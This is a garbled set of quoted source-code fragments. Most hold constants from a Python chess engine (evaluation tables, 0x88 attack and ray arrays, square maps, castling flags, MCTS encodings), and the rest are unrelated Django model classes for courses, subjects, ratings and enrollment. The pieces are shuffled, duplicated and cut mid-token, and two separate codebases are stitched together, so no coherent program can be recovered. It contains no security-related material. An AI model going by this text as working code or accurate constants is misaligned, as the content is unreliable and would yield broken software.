0.0, 0.0, 0.0, 0.0, -0.5], [ -0.5,", "-1.0, -0.5, -0.5, -1.0, -1.0, -2.0] ] ROOK_EVAL = [ [ 0.0, 0.0,", "0, 0, 0, 0, 0,20, 2, 24, 2,20, 0, 0, 0, 0, 0,", "-3.0, -3.0, -3.0, -3.0, 
-4.0, -5.0] ] PAWN_EVAL = [ [0.0, 0.0, 0.0,", "1.5, 2.0, 2.0, 1.5, 0.5, -3.0], [-3.0, 0.0, 1.5, 2.0, 2.0, 1.5, 0.0,", "[ -2.0, -3.0, -3.0, -4.0, -4.0, -3.0, -3.0, -2.0], [ -1.0, -2.0, -2.0,", "0, 24,24,24,24,24,24,56, 0, 56,24,24,24,24,24,24, 0, 0, 0, 0, 0, 0, 2,53, 56, 53,", "0.0, 0.0, 2.0, 2.0 ], [ 2.0, 3.0, 1.0, 0.0, 0.0, 1.0, 3.0,", "can move PIECE_OFFSETS = { 'n': [-18, -33, -31, -14, 18, 33, 31,", "'c4': 66, 'd4': 67, 'e4': 68, 'f4': 69, 'g4': 70, 'h4': 71, 'a3':", "0, 0, 0, 15, 0, 0, 0, 0, 0, 0, 0, 0, 17,", "[-4.0, -2.0, 0.0, 0.0, 0.0, 0.0, -2.0, -4.0], [-3.0, 0.0, 1.0, 1.5, 1.5,", "1.0, 2.0, 3.0, 3.0, 2.0, 1.0, 1.0], [0.5, 0.5, 1.0, 2.5, 2.5, 1.0,", "1 : 'p', 2 : 'n', 3 : 'b', 4 : 'r', 5", "[0.5, 0.5, 1.0, 2.5, 2.5, 1.0, 0.5, 0.5], [0.0, 0.0, 0.0, 2.0, 2.0,", "0, 0, 0, 16, 0, 0, 0, 0, 15, 0, 0, 0, 0,", "SQUARES['a8'], 'flag': BITS['QSIDE_CASTLE']}, {'square': SQUARES['h8'], 'flag': BITS['KSIDE_CASTLE']}] } KING_EVAL = [ [ -3.0,", "1.0, 2.5, 2.5, 1.0, 0.5, 0.5], [0.0, 0.0, 0.0, 2.0, 2.0, 0.0, 0.0,", "0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 17,", "-1.0], [ 2.0, 2.0, 0.0, 0.0, 0.0, 0.0, 2.0, 2.0 ], [ 2.0,", "0, 0, 0, 0,20, 0, 0, 24, 0, 0,20, 0, 0, 0, 0,", "# Directions pawns can move: forward 1, forward 2, right (capture), left (capture)", "1.0, 1.0, 0.5, 0.5, -1.0], [ -1.0, 0.0, 1.0, 1.0, 1.0, 1.0, 0.0,", "-5.0], [-4.0, -2.0, 0.0, 0.0, 0.0, 0.0, -2.0, -4.0], [-3.0, 0.0, 1.0, 1.5,", "1.0, 0.0, -3.0], [-3.0, 0.5, 1.5, 2.0, 2.0, 1.5, 0.5, -3.0], [-3.0, 0.0,", ": 1, 'n' : 2, 'b' : 3, 'r' : 4, 'q' :", "0, 0,20, 0, 0, 0, 0, 0, 0, 20, 0, 0, 0, 0,", "####################################################### BLACK = 'b' WHITE = 'w' EMPTY = -1 PAWN = 'p'", "[{'square': SQUARES['a1'], 'flag': BITS['QSIDE_CASTLE']}, {'square': SQUARES['h1'], 'flag': BITS['KSIDE_CASTLE']}], 'b': [{'square': SQUARES['a8'], 'flag': BITS['QSIDE_CASTLE']},", "-3.0], [-3.0, 0.5, 1.0, 1.5, 1.5, 1.0, 0.5, -3.0], [-4.0, -2.0, 0.0, 0.5,", "0.5, 1.0, 1.5, 1.5, 1.0, 0.5, -3.0], [-4.0, -2.0, 0.0, 0.5, 0.5, 
0.0,", "0, 0, 0, 0, 17, 0, 0, 16, 0, 0, 15, 0, 0,", "] SHIFTS = { 'p': 0, 'n': 1, 'b': 2, 'r': 3, 'q':", "'g2': 102, 'h2': 103, 'a1': 112, 'b1': 113, 'c1': 114, 'd1': 115, 'e1':", "0, 0, 0,-16, 0, 0, 0, 0,-17, 0, 0, 0, 0,-15, 0, 0,", "0, 0, 0, 0, 0, 0, 0, 0, 17, 0, 16, 0, 15,", "-3.0, -2.0], [ -1.0, -2.0, -2.0, -2.0, -2.0, -2.0, -2.0, -1.0], [ 2.0,", "-2.0, -1.0, -1.0, -0.5, -0.5, -1.0, -1.0, -2.0] ] ROOK_EVAL = [ [", "-4.0, -5.0], [-4.0, -2.0, 0.0, 0.0, 0.0, 0.0, -2.0, -4.0], [-3.0, 0.0, 1.0,", "5 RANK_4 = 4 RANK_5 = 3 RANK_6 = 2 RANK_7 = 1", "1.5, 1.5, 1.0, 0.5, -3.0], [-4.0, -2.0, 0.0, 0.5, 0.5, 0.0, -2.0, -4.0],", "0.0, -1.0, -0.5, 0.5], [0.5, 1.0, 1.0, -2.0, -2.0, 1.0, 1.0, 0.5], [0.0,", "0, 24, 0, 0, 0,20, 0, 0, 0, 0, 0, 0, 0, 0,20,", "{'square': SQUARES['h1'], 'flag': BITS['KSIDE_CASTLE']}], 'b': [{'square': SQUARES['a8'], 'flag': BITS['QSIDE_CASTLE']}, {'square': SQUARES['h8'], 'flag': BITS['KSIDE_CASTLE']}]", "[0.5, -0.5, -1.0, 0.0, 0.0, -1.0, -0.5, 0.5], [0.5, 1.0, 1.0, -2.0, -2.0,", "0, 0, 0, 0, 24, 0, 0, 0, 0, 0, 0,20, 0, 0,", "0, 0, 0, 0, 0, 0, 0, 2,53, 56, 53, 2, 0, 0,", "0, 'b8': 1, 'c8': 2, 'd8': 3, 'e8': 4, 'f8': 5, 'g8': 6,", "1.0, 1.0, 1.0, -1.0], [ -1.0, 0.5, 0.0, 0.0, 0.0, 0.0, 0.5, -1.0],", "-1.0], [ -1.0, 0.5, 0.0, 0.0, 0.0, 0.0, 0.5, -1.0], [ -2.0, -1.0,", "1.0, 1.0], [0.5, 0.5, 1.0, 2.5, 2.5, 1.0, 0.5, 0.5], [0.0, 0.0, 0.0,", "0,20, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,20, 2, 24,", "-3.0], [ -3.0, -4.0, -4.0, -5.0, -5.0, -4.0, -4.0, -3.0], [ -3.0, -4.0,", "1, 'b' : -1 } ATTACKS = [ 20,0, 0, 0, 0, 0,", "16, 0, 0, 0, 15, 0, 0, 0, 0, 0, 0, 0, 0,", "0, 0, 24,24,24,24,24,24,56, 0, 56,24,24,24,24,24,24, 0, 0, 0, 0, 0, 0, 2,53, 56,", "19, 'e7': 20, 'f7': 21, 'g7': 22, 'h7': 23, 'a6': 32, 'b6': 33,", "'e7': 20, 'f7': 21, 'g7': 22, 'h7': 23, 'a6': 32, 'b6': 33, 'c6':", "65, 'c4': 66, 'd4': 67, 'e4': 68, 'f4': 69, 'g4': 70, 'h4': 71,", "= { 'w': [{'square': SQUARES['a1'], 'flag': BITS['QSIDE_CASTLE']}, {'square': SQUARES['h1'], 'flag': 
BITS['KSIDE_CASTLE']}], 'b': [{'square':", "-2.0, -1.0], [ 2.0, 2.0, 0.0, 0.0, 0.0, 0.0, 2.0, 2.0 ], [", "3, 'r' : 4, 'q' : 5, 'k' : 6, } MCTS_DECODER =", "0.0, 0.0, 0.0, 0.0, 0.0, -0.5], [ 0.0, 0.0, 0.0, 0.5, 0.5, 0.0,", "-3.0, -3.0, -3.0, -3.0, -4.0, -5.0], [-4.0, -2.0, 0.0, 0.0, 0.0, 0.0, -2.0,", "0, 0, 0, 0,-16, 0, 0, 0, 0,-17, 0, 0, 0, 0,-15, 0,", "0.0, 0.5, -1.0], [ -2.0, -1.0, -1.0, -1.0, -1.0, -1.0, -1.0, -2.0] ]", "ROOK_EVAL = [ [ 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [", "= [ [-5.0, -4.0, -3.0, -3.0, -3.0, -3.0, -4.0, -5.0], [-4.0, -2.0, 0.0,", "3.0, 2.0, 1.0, 1.0], [0.5, 0.5, 1.0, 2.5, 2.5, 1.0, 0.5, 0.5], [0.0,", "0, 0, 0, 0, 0,-15,-16,-17, 0, 0, 0, 0, 0, 0, 0, 0,", "0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 0,", "= 2 RANK_7 = 1 RANK_8 = 0 SQUARES = { 'a8': 0,", "-3.0, -3.0, -3.0, -4.0, -5.0] ] PAWN_EVAL = [ [0.0, 0.0, 0.0, 0.0,", "3, 'q': 4, 'k': 5 } FLAGS = { 'NORMAL': 'n', 'CAPTURE': 'c',", "2.0 ] ] QUEEN_EVAL = [ [ -2.0, -1.0, -1.0, -0.5, -0.5, -1.0,", "'k' SYMBOLS = 'pnbrqkPNBRQK' DEFAULT_POSITION = 'rnbqkbnr/pppppppp/8/8/8/8/PPPPPPPP/RNBQKBNR w KQkq - 0 1' POSSIBLE_RESULTS", "0.0, 0.0, 0.0, 0.0, -1.0], [ -1.0, 0.0, 0.5, 0.5, 0.5, 0.5, 0.0,", "[ -1.0, 0.5, 0.0, 0.0, 0.0, 0.0, 0.5, -1.0], [ -2.0, -1.0, -1.0,", "0, 0, 0, 0, 0, 0, 17, 0, 16, 0, 15, 0, 0,", "0, 0, 24, 0, 0,20, 0, 0, 0, 0, 0, 0, 0, 0,20,", "17, 16, 15, -1], 'k': [-17, -16, -15, 1, 17, 16, 15, -1]", "0, 0, 0, 0,-15, 0,-16, 0,-17, 0, 0, 0, 0, 0, 0, 0,", "18, 'd7': 19, 'e7': 20, 'f7': 21, 'g7': 22, 'h7': 23, 'a6': 32,", "1.5, 1.0, 0.0, -3.0], [-3.0, 0.5, 1.5, 2.0, 2.0, 1.5, 0.5, -3.0], [-3.0,", "= { 'p' : 1, 'n' : 2, 'b' : 3, 'r' :", "0, 0, 0, 0, 0,-17 ] SHIFTS = { 'p': 0, 'n': 1,", "0.0, 0.0] ] BISHOP_EVAL = [ [ -2.0, -1.0, -1.0, -1.0, -1.0, -1.0,", "17, 0, 0, 0, 0, 16, 0, 0, 0, 0, 15, 0, 0,", "0, 0, 0, 0, 17, 16, 15, 0, 0, 0, 0, 0, 0,", "0,-15, 0, 0, 0,-16, 0, 0, 0,-17, 0, 0, 0, 0, 0, 0,-15,", "0,-16, 0, 0, 0, 0,-17, 0, 0, 0, 0,-15, 0, 0, 0, 0,", "'h1': 119 } ROOKS = { 'w': [{'square': 
SQUARES['a1'], 'flag': BITS['QSIDE_CASTLE']}, {'square': SQUARES['h1'],", "0, 0, 0,20, 0, 0, 0, 0, 0, 0,20, 0, 0, 0, 24,", "0.5, 0.0, -2.0, -4.0], [-5.0, -4.0, -3.0, -3.0, -3.0, -3.0, -4.0, -5.0] ]", "1, 17, 16, 15, -1] } MCTS_MAPPING = { 'p' : 1, 'n'", "= 3 RANK_6 = 2 RANK_7 = 1 RANK_8 = 0 SQUARES =", "0,20, 0, 0, 20,0, 0, 0, 0, 0, 0, 24, 0, 0, 0,", "{ 'a8': 0, 'b8': 1, 'c8': 2, 'd8': 3, 'e8': 4, 'f8': 5,", "[ -3.0, -4.0, -4.0, -5.0, -5.0, -4.0, -4.0, -3.0], [ -2.0, -3.0, -3.0,", "113, 'c1': 114, 'd1': 115, 'e1': 116, 'f1': 117, 'g1': 118, 'h1': 119", "[ -0.5, 0.0, 0.5, 0.5, 0.5, 0.5, 0.0, -0.5], [ 0.0, 0.0, 0.5,", "-1] } MCTS_MAPPING = { 'p' : 1, 'n' : 2, 'b' :", "0, 0, 0,-15, 0,-16, 0,-17, 0, 0, 0, 0, 0, 0, 0, 0,", "= -1 PAWN = 'p' KNIGHT = 'n' BISHOP = 'b' ROOK =", "0, 0, 0, 0, 0, 0, 0, 0,-15, 0, 0,-16, 0, 0,-17, 0,", "{ 'NORMAL': 'n', 'CAPTURE': 'c', 'BIG_PAWN': 'b', 'EP_CAPTURE': 'e', 'PROMOTION': 'p', 'KSIDE_CASTLE': 'k',", "0.0, 0.0, -1.0], [ -1.0, 0.0, 0.5, 0.5, 0.5, 0.5, 0.0, -1.0], [", "0, 0, 0, 0, 0,-16, 0, 0, 0, 0, 0, 0,-17 ] SHIFTS", "= 'k' SYMBOLS = 'pnbrqkPNBRQK' DEFAULT_POSITION = 'rnbqkbnr/pppppppp/8/8/8/8/PPPPPPPP/RNBQKBNR w KQkq - 0 1'", "0.0, 0.0, 0.5, 0.5, 0.5, 0.5, 0.0, -0.5], [ -1.0, 0.5, 0.5, 0.5,", "0.0, 0.0, -1.0, -0.5, 0.5], [0.5, 1.0, 1.0, -2.0, -2.0, 1.0, 1.0, 0.5],", "-1, 0, 0, 0, 0, 0, 0, 0,-15,-16,-17, 0, 0, 0, 0, 0,", "[ -1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, -1.0], [ -1.0, 0.5, 0.0,", "0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [ 0.5, 1.0, 1.0, 1.0, 1.0, 1.0,", "'n', 3 : 'b', 4 : 'r', 5 : 'q', 6 : 'k'", "0, 0, 0,-17, 0, 0, 0, 0, 0, 0,-15, 0, 0, 0, 0,-16,", "'f8': 5, 'g8': 6, 'h8': 7, 'a7': 16, 'b7': 17, 'c7': 18, 'd7':", "PAWN_OFFSETS = { 'b': [16, 32, 17, 15], 'w': [-16, -32, -17, -15]", "-16, -15, 1, 17, 16, 15, -1] } MCTS_MAPPING = { 'p' :", "0, 0, 0, 0, 0, 0, 0, 0, 0,-15, 0,-16, 0,-17, 0, 0,", "0.5, 0.5, 0.0, -1.0], [ -1.0, 0.0, 0.5, 0.0, 0.0, 0.0, 0.0, -1.0],", "4, 'q' : 5, 'k' : 6, } MCTS_DECODER = { 1 :", "'b' ROOK = 'r' QUEEN = 'q' KING 
= 'k' SYMBOLS = 'pnbrqkPNBRQK'", ": 'k' } MCTS_COLOR_MAP = { 'w' : 1, 'b' : -1 }", "-0.5, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.5], [ -0.5, 0.0, 0.0, 0.0,", "[ -1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -1.0], [ -1.0, 0.0, 0.5,", "0.5, 0.5, 0.5, 0.0, -0.5], [ 0.0, 0.0, 0.5, 0.5, 0.5, 0.5, 0.0,", "15, -1] } MCTS_MAPPING = { 'p' : 1, 'n' : 2, 'b'", "0, 0, 0, 0, 0, 0, 0,-15, 0, 0,-16, 0, 0,-17, 0, 0,", "36, 'f6': 37, 'g6': 38, 'h6': 39, 'a5': 48, 'b5': 49, 'c5': 50,", "0.0, 0.0, 0.0, 0.0], [5.0, 5.0, 5.0, 5.0, 5.0, 5.0, 5.0, 5.0], [1.0,", "0, 16, 0, 0, 0, 0, 15, 0, 0, 0, 0, 0, 0,", "0, 0, 0, 0, 0, 0, 0, 17, 16, 15, 0, 0, 0,", "0, 0, 0,20, 0, 0, 0, 0, 0, 0, 0, 0,20, 0, 0,", "-1 PAWN = 'p' KNIGHT = 'n' BISHOP = 'b' ROOK = 'r'", "0.5, 0.5], [0.0, 0.0, 0.0, 2.0, 2.0, 0.0, 0.0, 0.0], [0.5, -0.5, -1.0,", "1.0, -1.0], [ -1.0, 0.5, 0.0, 0.0, 0.0, 0.0, 0.5, -1.0], [ -2.0,", "= 6 RANK_3 = 5 RANK_4 = 4 RANK_5 = 3 RANK_6 =", "-3.0, -3.0, -2.0], [ -1.0, -2.0, -2.0, -2.0, -2.0, -2.0, -2.0, -1.0], [", "0.0, 0.0, 0.0, 0.0, -2.0, -4.0], [-3.0, 0.0, 1.0, 1.5, 1.5, 1.0, 0.0,", "0,-17, 0, 0, 0, 0, 0, 0,-15, 0, 0, 0, 0,-16, 0, 0,", "-17, -15] } # Directions different pieces can move PIECE_OFFSETS = { 'n':", "3.0, 1.0, 0.0, 0.0, 1.0, 3.0, 2.0 ] ] QUEEN_EVAL = [ [", "0.0, 0.0, 0.0, 0.0, 0.0], [5.0, 5.0, 5.0, 5.0, 5.0, 5.0, 5.0, 5.0],", "0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,20, 2, 24,", "SQUARES['h1'], 'flag': BITS['KSIDE_CASTLE']}], 'b': [{'square': SQUARES['a8'], 'flag': BITS['QSIDE_CASTLE']}, {'square': SQUARES['h8'], 'flag': BITS['KSIDE_CASTLE']}] }", "1, 1, 1, 1, 0, -1, -1, -1,-1, -1, -1, -1, 0, 0,", "0.0, 0.5, 1.0, 1.0, 0.5, 0.0, -1.0], [ -1.0, 0.5, 0.5, 1.0, 1.0,", "-1.0, -2.0] ] KNIGHT_EVAL = [ [-5.0, -4.0, -3.0, -3.0, -3.0, -3.0, -4.0,", "0, 0,-15, 0, 0, 0, 0,-16, 0, 0, 0, 0,-17, 0, 0, 0,", "0, 20,0, 0, 0, 0, 0, 0, 24, 0, 0, 0, 0, 0,", ": 6, } MCTS_DECODER = { 1 : 'p', 2 : 'n', 3", "-1.0, 0.0, 1.0, 1.0, 1.0, 1.0, 0.0, -1.0], [ -1.0, 1.0, 1.0, 1.0,", "0.0, 0.0, 0.0, 0.0, 0.0, -0.5], [ -0.5, 0.0, 0.0, 
0.0, 0.0, 0.0,", "forward 2, right (capture), left (capture) PAWN_OFFSETS = { 'b': [16, 32, 17,", "0, 0, 0, 0, 0, 0, 0, 0,20, 0, 0, 24, 0, 0,20,", "'e', 'PROMOTION': 'p', 'KSIDE_CASTLE': 'k', 'QSIDE_CASTLE': 'q' } BITS = { 'NORMAL': 1,", "0.0, 0.0, 0.0, 0.0, 0.5, -1.0], [ -2.0, -1.0, -1.0, -1.0, -1.0, -1.0,", "-1.0], [ -1.0, 0.0, 1.0, 1.0, 1.0, 1.0, 0.0, -1.0], [ -1.0, 1.0,", "0, 0, 0, 0, 20, 0, 0, 0, 0, 24, 0, 0, 0,", "'KSIDE_CASTLE': 32, 'QSIDE_CASTLE': 64 } RANK_1 = 7 RANK_2 = 6 RANK_3 =", "3.0, 3.0, 2.0, 1.0, 1.0], [0.5, 0.5, 1.0, 2.5, 2.5, 1.0, 0.5, 0.5],", "0, 0, 0,20, 2, 24, 2,20, 0, 0, 0, 0, 0, 0, 0,", "0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,-15, 0,-16,", "0, 0, 0, 0,20, 0, 0, 0, 0, 20,0, 0, 0, 0, 0,", "'PROMOTION': 'p', 'KSIDE_CASTLE': 'k', 'QSIDE_CASTLE': 'q' } BITS = { 'NORMAL': 1, 'CAPTURE':", "0, 0, 16, 0, 0, 0, 15, 0, 0, 0, 0, 0, 0,", "0, 0,-15,-16,-17, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,", "-1.0], [ -1.0, 0.0, 0.5, 1.0, 1.0, 0.5, 0.0, -1.0], [ -1.0, 0.5,", "0, 24, 0, 0, 0, 0, 0, 0,20 ] RAYS = [ 17,", "17, 16, 15, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1,", "0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1,", "0.0, 0.5, 0.5, 0.5, 0.5, 0.0, -0.5], [ -1.0, 0.5, 0.5, 0.5, 0.5,", "0.5, 1.0, 1.0, 0.5, 0.5, -1.0], [ -1.0, 0.0, 1.0, 1.0, 1.0, 1.0,", "0, 0, 20,0, 0, 0, 0, 0, 24, 0, 0, 0, 0, 0,20,", "0, 0, 0, 0, 0,-16, 0, 0, 0, 0, 0,-17, 0, 0, -15,", "0.5, -3.0], [-3.0, 0.0, 1.5, 2.0, 2.0, 1.5, 0.0, -3.0], [-3.0, 0.5, 1.0,", "0.0, 0.0, 0.0, -0.5], [ 0.0, 0.0, 0.0, 0.5, 0.5, 0.0, 0.0, 0.0]", "2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,20, 2,", "0, 0, 24, 0, 0, 0, 0, 0,20, 0, 0, 0, 0, 20,", "0, 0, 0,-15, 0, 0,-16, 0, 0,-17, 0, 0, 0, 0, 0, 0,", "0, 0, 0,20 ] RAYS = [ 17, 0, 0, 0, 0, 0,", "0, 0, -15, 0, 0, 0, 0, 0, 0,-16, 0, 0, 0, 0,", "-4.0, -4.0, -5.0, -5.0, -4.0, -4.0, -3.0], [ -2.0, -3.0, -3.0, -4.0, -4.0,", "0.5, 0.5, 0.0, -0.5], [ -1.0, 0.5, 0.5, 0.5, 0.5, 0.5, 0.0, -1.0],", "0.0, -0.5], [ -1.0, 0.5, 0.5, 0.5, 0.5, 0.5, 0.0, -1.0], [ -1.0,", "PAWN_EVAL = [ [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 
0.0], [5.0, 5.0,", "0, 24, 0, 0,20, 0, 0, 0, 0, 0, 0, 0, 0, 0,", "-1.0], [ -1.0, 0.5, 0.5, 1.0, 1.0, 0.5, 0.5, -1.0], [ -1.0, 0.0,", "0, 0, 0, 0, 0, 17, 16, 15, 0, 0, 0, 0, 0,", "5.0, 5.0, 5.0, 5.0], [1.0, 1.0, 2.0, 3.0, 3.0, 2.0, 1.0, 1.0], [0.5,", "38, 'h6': 39, 'a5': 48, 'b5': 49, 'c5': 50, 'd5': 51, 'e5': 52,", "0, 0, 0, 0, 20,0, 0, 0, 0, 0, 24, 0, 0, 0,", "0.5, 0.5, 1.0, 1.0, 0.5, 0.5, -1.0], [ -1.0, 0.0, 1.0, 1.0, 1.0,", "0, 15, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,", "'CAPTURE': 2, 'BIG_PAWN': 4, 'EP_CAPTURE': 8, 'PROMOTION': 16, 'KSIDE_CASTLE': 32, 'QSIDE_CASTLE': 64 }", "0.5, 1.0, 1.0, 0.5, 0.0, -1.0], [ -1.0, 0.5, 0.5, 1.0, 1.0, 0.5,", ": 'p', 2 : 'n', 3 : 'b', 4 : 'r', 5 :", "0, 0, 24, 0, 0, 0,20, 0, 0, 0, 0, 0, 0, 0,", "'b': 2, 'r': 3, 'q': 4, 'k': 5 } FLAGS = { 'NORMAL':", "0, 0, 0, 0, 0, 0,-15, 0, 0, 0,-16, 0, 0, 0,-17, 0,", "[ -1.0, 0.5, 0.5, 1.0, 1.0, 0.5, 0.5, -1.0], [ -1.0, 0.0, 1.0,", "0, 0, 0, 0, 0,20, 0, 0, 0, 0, 20, 0, 0, 0,", "-4.0, -3.0], [ -3.0, -4.0, -4.0, -5.0, -5.0, -4.0, -4.0, -3.0], [ -2.0,", "'p', 2 : 'n', 3 : 'b', 4 : 'r', 5 : 'q',", "0, 0, 0, 0, 0, 0, 0, 0, 0,20, 0, 0, 24, 0,", "0, 0, 0, 0, 0, 0, 0, 0, 0, 0,-15, 0, 0,-16, 0,", "-2.0, 1.0, 1.0, 0.5], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0] ]", "'b2': 97, 'c2': 98, 'd2': 99, 'e2': 100, 'f2': 101, 'g2': 102, 'h2':", "'flag': BITS['QSIDE_CASTLE']}, {'square': SQUARES['h1'], 'flag': BITS['KSIDE_CASTLE']}], 'b': [{'square': SQUARES['a8'], 'flag': BITS['QSIDE_CASTLE']}, {'square': SQUARES['h8'],", "0,-15, 0, 0, 0, 0, 0,-16, 0, 0, 0, 0, 0,-17, 0, 0,", "0, 0, 0, 0, 0,20 ] RAYS = [ 17, 0, 0, 0,", "-1.0, 0.5, 0.5, 0.5, 0.5, 0.5, 0.0, -1.0], [ -1.0, 0.0, 0.5, 0.0,", "] KNIGHT_EVAL = [ [-5.0, -4.0, -3.0, -3.0, -3.0, -3.0, -4.0, -5.0], [-4.0,", "0, 16, 0, 0, 0, 0, 0, 0, 15, 0, 0, 17, 0,", "0, 0, 15, 0, 0, 0, 0, 0, 0, 17, 0, 0, 0,", "PIECE_OFFSETS = { 'n': [-18, -33, -31, -14, 18, 33, 31, 14], 'b':", "56, 53, 2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,", "'PROMOTION': 16, 'KSIDE_CASTLE': 32, 'QSIDE_CASTLE': 64 } 
RANK_1 = 7 RANK_2 = 6", "0, 2,53, 56, 53, 2, 0, 0, 0, 0, 0, 0, 24,24,24,24,24,24,56, 0,", "112, 'b1': 113, 'c1': 114, 'd1': 115, 'e1': 116, 'f1': 117, 'g1': 118,", "'w': [{'square': SQUARES['a1'], 'flag': BITS['QSIDE_CASTLE']}, {'square': SQUARES['h1'], 'flag': BITS['KSIDE_CASTLE']}], 'b': [{'square': SQUARES['a8'], 'flag':", "-0.5], [ -0.5, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.5], [ 0.0, 0.0," ]
[ "models.ForeignKey('Faculty', models.DO_NOTHING, db_column='faculty', blank=True, null=True) category = models.IntegerField(blank=True, null=True) class Meta: managed =", "{self.name}' class Subject(models.Model): name = models.CharField(max_length=80, blank=True, null=True) category = models.ForeignKey(Category, models.DO_NOTHING, db_column='category',", "class Meta: managed = False db_table = 'subject' def __str__(self): return f'Subject {self.id}", "__str__(self): return f'Faculty {self.name}' class Course(models.Model): # id = models.IntegerField(primary_key=True) name = models.CharField(max_length=80,", "django.db import models from django.utils import timezone class Faculty(models.Model): name = models.CharField(max_length=80, blank=True,", "= models.IntegerField(primary_key=True) name = models.CharField(max_length=80, blank=True, null=True) course_describtion = models.TextField(blank=True, null=True) faculty =", "null=True) class Meta: managed = False db_table = 'course' def __str__(self): return f'Course", "Name: {self.name}' class SubjectRating(models.Model): subject = models.ForeignKey(Subject, models.DO_NOTHING, db_column='subject', blank=True, null=True) student =", "| Name: {self.name}' class Category(models.Model): name = models.CharField(max_length=80, blank=True, null=True) parent = models.ForeignKey('self',", "__str__(self): return f'Category {self.name}' class Subject(models.Model): name = models.CharField(max_length=80, blank=True, null=True) category =", "db_column='subject') student = models.ForeignKey('users.Student', models.DO_NOTHING, db_column='student') status = models.IntegerField(blank=True, null=True) # lesson =", "lesson = models.ForeignKey('Lesson', models.DO_NOTHING, db_column='lesson', blank=True, null=True) class Meta: managed = False db_table", "class Meta: managed = False db_table = 'course' def __str__(self): return f'Course {self.id}", "= 'subject' def __str__(self): return f'Subject {self.id} | Name: {self.name}' class 
SubjectRating(models.Model): subject", "blank=True, null=True) thumb = models.CharField(max_length=100, blank=True, null=True) pic = models.CharField(max_length=200, blank=True, null=True) description", "db_column='lesson', blank=True, null=True) class Meta: managed = False db_table = 'enrollment' def __str__(self):", "{self.name}' class Course(models.Model): # id = models.IntegerField(primary_key=True) name = models.CharField(max_length=80, blank=True, null=True) course_describtion", "False db_table = 'subject_rating' def __str__(self): return f'Subject: {self.subject.name} | Student {self.student.account.username} |", "blank=True, null=True) category = models.ForeignKey(Category, models.DO_NOTHING, db_column='category', blank=True, null=True) thumb = models.CharField(max_length=100, blank=True,", "f'Faculty {self.name}' class Course(models.Model): # id = models.IntegerField(primary_key=True) name = models.CharField(max_length=80, blank=True, null=True)", "= False db_table = 'enrollment' def __str__(self): return f'Student {self.student.account.username} | Subject: {self.subject.name}'", "= models.ForeignKey('self', models.DO_NOTHING, db_column='parent', blank=True, null=True) class Meta: managed = False db_table =", "null=True) description = models.CharField(max_length=1000, blank=True, null=True) class Meta: managed = False db_table =", "Category(models.Model): name = models.CharField(max_length=80, blank=True, null=True) parent = models.ForeignKey('self', models.DO_NOTHING, db_column='parent', blank=True, null=True)", "return f'Subject {self.id} | Name: {self.name}' class SubjectRating(models.Model): subject = models.ForeignKey(Subject, models.DO_NOTHING, db_column='subject',", "class Course(models.Model): # id = models.IntegerField(primary_key=True) name = models.CharField(max_length=80, blank=True, null=True) course_describtion =", "= models.ForeignKey('Faculty', models.DO_NOTHING, db_column='faculty', blank=True, null=True) category = 
models.IntegerField(blank=True, null=True) class Meta: managed", "'category' def __str__(self): return f'Category {self.name}' class Subject(models.Model): name = models.CharField(max_length=80, blank=True, null=True)", "db_column='category', blank=True, null=True) thumb = models.CharField(max_length=100, blank=True, null=True) pic = models.CharField(max_length=200, blank=True, null=True)", "= models.CharField(max_length=100, blank=True, null=True) pic = models.CharField(max_length=200, blank=True, null=True) description = models.CharField(max_length=1000, blank=True,", "status = models.IntegerField(blank=True, null=True) # lesson = models.ForeignKey('Lesson', models.DO_NOTHING, db_column='lesson', blank=True, null=True) class", "models.ForeignKey('Lesson', models.DO_NOTHING, db_column='lesson', blank=True, null=True) class Meta: managed = False db_table = 'enrollment'", "return f'Category {self.name}' class Subject(models.Model): name = models.CharField(max_length=80, blank=True, null=True) category = models.ForeignKey(Category,", "'subject' def __str__(self): return f'Subject {self.id} | Name: {self.name}' class SubjectRating(models.Model): subject =", "{self.name}' class Category(models.Model): name = models.CharField(max_length=80, blank=True, null=True) parent = models.ForeignKey('self', models.DO_NOTHING, db_column='parent',", "models.DateTimeField(blank=True, null=True) class Meta: managed = False db_table = 'subject_rating' def __str__(self): return", "{self.rating}' class Enrollment(models.Model): subject = models.ForeignKey('Subject', models.DO_NOTHING, db_column='subject') student = models.ForeignKey('users.Student', models.DO_NOTHING, db_column='student')", "= models.ForeignKey('users.Student', models.DO_NOTHING, db_column='student', blank=True, null=True) rating = models.IntegerField(blank=True, null=True) commence = models.TextField(blank=True,", "models.DO_NOTHING, db_column='subject') student = models.ForeignKey('users.Student', models.DO_NOTHING, 
db_column='student') status = models.IntegerField(blank=True, null=True) # lesson", "null=True) pic = models.CharField(max_length=200, blank=True, null=True) description = models.CharField(max_length=1000, blank=True, null=True) class Meta:", "class Subject(models.Model): name = models.CharField(max_length=80, blank=True, null=True) category = models.ForeignKey(Category, models.DO_NOTHING, db_column='category', blank=True,", "| Name: {self.name}' class SubjectRating(models.Model): subject = models.ForeignKey(Subject, models.DO_NOTHING, db_column='subject', blank=True, null=True) student", "models.ForeignKey(Category, models.DO_NOTHING, db_column='category', blank=True, null=True) thumb = models.CharField(max_length=100, blank=True, null=True) pic = models.CharField(max_length=200,", "{self.subject.name} | Student {self.student.account.username} | Rating: {self.rating}' class Enrollment(models.Model): subject = models.ForeignKey('Subject', models.DO_NOTHING,", "= models.DateTimeField(blank=True, null=True) class Meta: managed = False db_table = 'subject_rating' def __str__(self):", "| Rating: 